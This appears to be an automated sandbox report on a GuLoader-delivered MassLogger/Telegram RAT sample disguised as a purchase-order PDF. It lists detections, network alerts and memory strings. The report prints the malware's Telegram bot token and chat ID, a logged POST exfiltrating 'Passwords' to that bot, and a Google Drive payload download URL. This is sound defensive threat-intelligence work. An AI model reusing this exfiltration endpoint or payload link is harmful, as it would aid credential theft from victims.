Edit tour

Windows Analysis Report
PURCHASE ORDER TRC-0909718-24_pdf.exe

Overview

General Information

Sample name:	PURCHASE ORDER TRC-0909718-24_pdf.exe
Analysis ID:	1576421
MD5:	95611e69a35eafc00725b14abcc7cc1a
SHA1:	ce2e851da7726a726c4232463cf2ddd2e96ab27d
SHA256:	e6a47a3ccdb6e669409024f10c2d1ebddb97d93b8c8eda17055ba377207f62a0
Tags:	exeGuLoaderuser-threatcat_ch
Infos:

Detection

GuLoader, MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Disable Task Manager(disabletaskmgr)

Disables CMD prompt

Disables the Windows task manager (taskmgr)

Initial sample is a PE file and has a suspicious name

Sample has a suspicious name (potential lure to open the executable)

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

PURCHASE ORDER TRC-0909718-24_pdf.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe" MD5: 95611E69A35EAFC00725B14ABCC7CC1A)

PURCHASE ORDER TRC-0909718-24_pdf.exe (PID: 7716 cmdline: "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe" MD5: 95611E69A35EAFC00725B14ABCC7CC1A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2006375263.0000000005405000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000004.00000002.2918352521.0000000003F75000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: PURCHASE ORDER TRC-0909718-24_pdf.exe PID: 7716	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: PURCHASE ORDER TRC-0909718-24_pdf.exe PID: 7716	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PURCHASE ORDER TRC-0909718-24_pdf.exe PID: 7716	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 3 entries

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T03:29:57.845766+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49742	149.154.167.220	443	TCP
2024-12-17T03:30:01.216537+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49749	149.154.167.220	443	TCP
2024-12-17T03:30:14.445035+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49785	149.154.167.220	443	TCP
2024-12-17T03:30:22.223697+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49803	149.154.167.220	443	TCP
2024-12-17T03:30:25.891903+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49815	149.154.167.220	443	TCP
2024-12-17T03:30:30.827003+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49827	149.154.167.220	443	TCP
2024-12-17T03:30:35.275690+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49839	149.154.167.220	443	TCP
2024-12-17T03:30:38.521348+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49850	149.154.167.220	443	TCP
2024-12-17T03:30:44.060895+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49863	149.154.167.220	443	TCP
2024-12-17T03:30:48.646565+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49875	149.154.167.220	443	TCP
2024-12-17T03:30:51.952053+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49885	149.154.167.220	443	TCP
2024-12-17T03:30:56.279726+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49898	149.154.167.220	443	TCP
2024-12-17T03:31:00.594692+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49907	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T03:29:47.537292+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	193.122.130.0	80	TCP
2024-12-17T03:29:55.662432+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	193.122.130.0	80	TCP
2024-12-17T03:29:59.302938+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49748	193.122.130.0	80	TCP
2024-12-17T03:30:12.490733+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49755	193.122.130.0	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T03:29:40.007753+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	142.250.186.174	443	TCP

HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e18c888856fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035CD1000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2947972912.00000000385C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/-B
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namex
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.0000000005688000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.00000000056C2000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2945989990.0000000034D90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2153436162.00000000056FD000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.00000000056EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2153436162.00000000056FD000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.0000000005688000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy&export=download
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2153436162.00000000056FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy&export=downloadT
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2153436162.00000000056FD000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.00000000056EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/t
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Code function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052F3

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: PURCHASE ORDER TRC-0909718-24_pdf.exe
Source: initial sample	Static PE information: Filename: PURCHASE ORDER TRC-0909718-24_pdf.exe

Sample has a suspicious name (potential lure to open the executable)

Source: PURCHASE ORDER TRC-0909718-24_pdf.exe

Static file information: Suspicious name

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004032A0
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		4_2_004032A0

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 0_2_00404B30	0_2_00404B30
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 0_2_00407041	0_2_00407041
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 0_2_0040686A	0_2_0040686A
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 4_2_00407041	4_2_00407041
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 4_2_0040686A	4_2_0040686A
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 4_2_00404B30	4_2_00404B30
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 4_2_00154328	4_2_00154328
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 4_2_00158DA0	4_2_00158DA0
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 4_2_00155968	4_2_00155968
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 4_2_00155F90	4_2_00155F90

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Code function: String function: 00402BBF appears 51 times

Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946427249.0000000035AE7000.00000004.00000010.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PURCHASE ORDER TRC-0909718-24_pdf.exe

Source: PURCHASE ORDER TRC-0909718-24_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/8@6/5

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004032A0
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		4_2_004032A0

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Code function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045B4

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens

Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nshE91D.tmp

Jump to behavior

Source: PURCHASE ORDER TRC-0909718-24_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DC5000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DB5000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DD3000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PURCHASE ORDER TRC-0909718-24_pdf.exe

Virustotal: Detection: 47%

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

File read: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process created: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process created: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"	Jump to behavior

